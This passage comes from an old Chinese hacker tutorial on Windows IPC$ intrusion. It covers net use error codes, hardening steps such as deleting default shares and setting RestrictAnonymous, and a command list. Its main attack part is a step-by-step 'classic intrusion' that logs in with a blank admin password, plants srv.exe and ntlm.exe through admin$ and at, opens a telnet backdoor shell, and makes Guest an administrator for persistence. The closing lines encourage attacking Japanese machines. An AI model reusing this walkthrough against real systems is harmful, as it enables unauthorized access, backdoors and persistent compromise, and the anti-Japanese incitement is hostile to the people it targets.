錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
關於ipc$連不上的問題比較復雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就靠大家自己體會和試驗了.
六 如何打開目標的IPC$(此段引自相關文章)
首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬,當然,這shell必須是admin許可權的,然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上面可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法),還是不行的話(比如有防火牆,殺不了)建議放棄。
七 如何防範ipc$入侵
1禁止空連接進行枚舉(此操作並不能阻止空連接的建立,引自《解剖win2000下的空會話》)
首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)
2禁止默認共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(每次輸入一個)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
3)停止server服務
net stop server /y (重新啟動後server服務會重新開啟)
4)修改注冊表
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙位元組值)一個主健再改鍵值。
3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-已禁用
4安裝防火牆(選中相關設置),或者埠過濾(濾掉139,445等),或者用新版本的優化大師
5設置復雜密碼,防止通過ipc$窮舉密碼
(本教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區原創http://ccbirds.yeah.net)
八 相關命令
1)建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
2)建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
3)映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
4)刪除一個ipc$連接
net use \\IP\ipc$ /del
5)刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
九 經典入侵模式
這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
十 總結:
關於ipc入侵就說這么多了,覺得已經夠詳細了,如果有不準確的地方,希望能與大家討論.
最後,希望大家不要隨便入侵,我寫這篇文章的目的是想解答大家的疑惑,並不是鼓勵大家隨便的入侵,如果你非想試一下,建議拿小日本的機子開練(什麼?為什麼?因為我討厭日本,沒別的)